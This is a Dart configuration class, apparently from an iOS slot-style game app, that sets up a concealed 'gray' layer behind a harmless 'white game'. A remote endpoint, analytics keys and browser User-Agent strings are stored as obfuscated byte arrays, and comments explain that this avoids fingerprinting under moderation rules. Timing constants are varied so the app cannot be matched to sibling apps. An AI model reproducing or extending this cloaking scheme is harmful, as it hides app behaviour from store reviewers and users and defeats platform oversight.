import '../core/veil_cipher.dart';

/// Central configuration for the masque (gray) layer.
///
/// Secrets that would fingerprint the app (config endpoint, AppsFlyer key,
/// Firebase project number, User-Agent scaffolding) are stored as veiled
/// byte arrays generated by `tool/encode_masque_values.dart`. Public URLs
/// (privacy, support) are PLAINTEXT on purpose — encoding a URL that is
/// public in App Store Connect only proves decoder infrastructure exists
/// (moderation §3).
///
/// The gray gate stays disabled (white game only) until [endpoint],
/// [appsFlyerKey] and [firebaseProjectNumber] are all non-empty.
abstract final class MasqueConfig {
  // ── Identity ────────────────────────────────────────────────────────────
  static const String appTitle = 'Velvet Jester Spin';
  static const String appNameToken = 'VelvetJesterSpin';
  static const String bundleId = 'com.velvetjester.spingame';

  /// iOS App Store numeric id (used for GCD lookup + `store_id`).
  static const String iosStoreId = '6797920582';

  // ── Rotated timing constants (project-unique; see moderation §7a) ───────
  // Non-round on purpose — every value here must differ from the template
  // defaults and from every previously shipped sibling. See the sibling
  // diff step in `gray_part_mixing_review.mdc` §6f before commit.
  static const int pushSnoozeSeconds = 255600; // 2d 23h — re-prompt lands
  // ~1 h before the 3-day mark so a user who advances the clock exactly 3
  // days sees the invite again. Value is deliberately non-round to keep the
  // §7a rotation vs siblings (Mirage 313200 / EggRunner 259200 / Bolt N/A).
  static const int organicRecheckSeconds = 8;
  static const int savedUrlExpiryDays = 6;

  // ── Public URLs — plaintext (declared in App Store Connect) ─────────────
  static const String privacyUrl =
      'https://velvetjesterspin.com/privacy-policy.html';
  static const String supportUrl =
      'https://velvetjesterspin.com/support.html';

  // ── Veiled secrets (paste from tool/encode_masque_values.dart) ──────────
  static const List<int> _endpoint = <int>[
    42, 190, 46, 106, 30, 196, 6, 162, 78, 134, 64, 71, 81, 91, 243, 163, 226,
    198, 70, 41, 49, 93, 61, 139, 75, 114, 64, 23, 23, 103, 77, 160, 74, 185,
    232, 15, 225, 61, 93,
  ];
  static const List<int> _gcd = <int>[
    42, 190, 46, 106, 30, 196, 6, 162, 95, 128, 72, 66, 80, 68, 183, 167, 225,
    194, 80, 61, 46, 84, 49, 151, 75, 114, 64, 23, 23, 109, 76, 189, 88, 177,
    227, 77, 206, 49, 76, 208, 43, 237, 36, 39, 75, 198, 14,
  ];
  static const List<int> _appsFlyerKey = <int>[
    1, 255, 24, 84, 3, 140, 104, 230, 86, 140, 103, 112, 97, 25, 205, 254, 169,
    214, 65, 108, 17, 66,
  ];
  static const List<int> _firebaseProject = <int>[
    118, 242, 108, 43, 93, 201, 29, 190, 15, 212, 24, 8,
  ];

  // User-Agent fragments — every scaffolding substring is veiled so no
  // plaintext browser-UA literal ships in the binary (moderation §4).
  static const List<int> _uaProduct = <int>[
    15, 165, 32, 115, 1, 146, 72, 162, 13, 205, 28,
  ];
  static const List<int> _uaPlatformPrefix = <int>[
    106, 163, 10, 114, 2, 144, 76, 182, 24, 160, 124, 100, 20, 70, 201, 174,
    254, 220, 70, 123, 13, 126,
  ];
  static const List<int> _uaPlatformSuffix = <int>[
    46, 163, 49, 127, 77, 179, 72, 238, 24, 172, 127, 17, 108, 6,
  ];
  static const List<int> _uaEngine = <int>[
    3, 186, 42, 118, 8, 169, 76, 239, 115, 138, 88, 30, 2, 31, 172, 232, 160,
    156, 18, 110, 98, 5, 31, 173, 49, 92, 99, 86, 24, 104, 75, 165, 73, 240,
    200, 68, 242, 62, 66, 141,
  ];
  static const List<int> _uaMobileToken = <int>[
    15, 165, 56, 115, 1, 155, 6, 188, 13, 166, 29, 5, 12,
  ];
  static const List<int> _safariVersion = <int>[115, 242, 116, 47];
  static const List<int> _safariTail = <int>[116, 250, 110, 52, 92];

  // App identity tokens for the User-Agent suffix. Only the scaffolding
  // prefixes are veiled — no plaintext `appid/` or `appname/` string ships in
  // the binary (moderation §4). The bundleId and appNameToken values stay
  // plaintext (already public via CFBundleIdentifier / App Store Connect).
  static const List<int> _uaAppIdPrefix = <int>[35, 186, 42, 115, 9, 209];
  static const List<int> _uaAppNamePrefix = <int>[
    35, 186, 42, 116, 12, 147, 76, 162,
  ];

  // ── Public accessors ────────────────────────────────────────────────────
  static String get endpoint => unveil(_endpoint);
  static String get gcdBase => unveil(_gcd);
  static String get appsFlyerKey => unveil(_appsFlyerKey);
  static String get firebaseProjectNumber => unveil(_firebaseProject);

  static String get uaProduct => unveil(_uaProduct);
  static String get uaPlatformPrefix => unveil(_uaPlatformPrefix);
  static String get uaPlatformSuffix => unveil(_uaPlatformSuffix);
  static String get uaEngine => unveil(_uaEngine);
  static String get uaMobileToken => unveil(_uaMobileToken);
  static String get safariVersion => unveil(_safariVersion);
  static String get safariTail => unveil(_safariTail);
  static String get uaAppIdPrefix => unveil(_uaAppIdPrefix);
  static String get uaAppNamePrefix => unveil(_uaAppNamePrefix);

  static String get storeToken => 'id$iosStoreId';

  /// Gate needs config endpoint + AF key + Firebase project number ONLY.
  /// Never add optional fields here — a missing optional value would
  /// silently disable the whole gray flow.
  static bool get grayCredentialsReady =>
      endpoint.isNotEmpty &&
      appsFlyerKey.isNotEmpty &&
      firebaseProjectNumber.isNotEmpty;
}
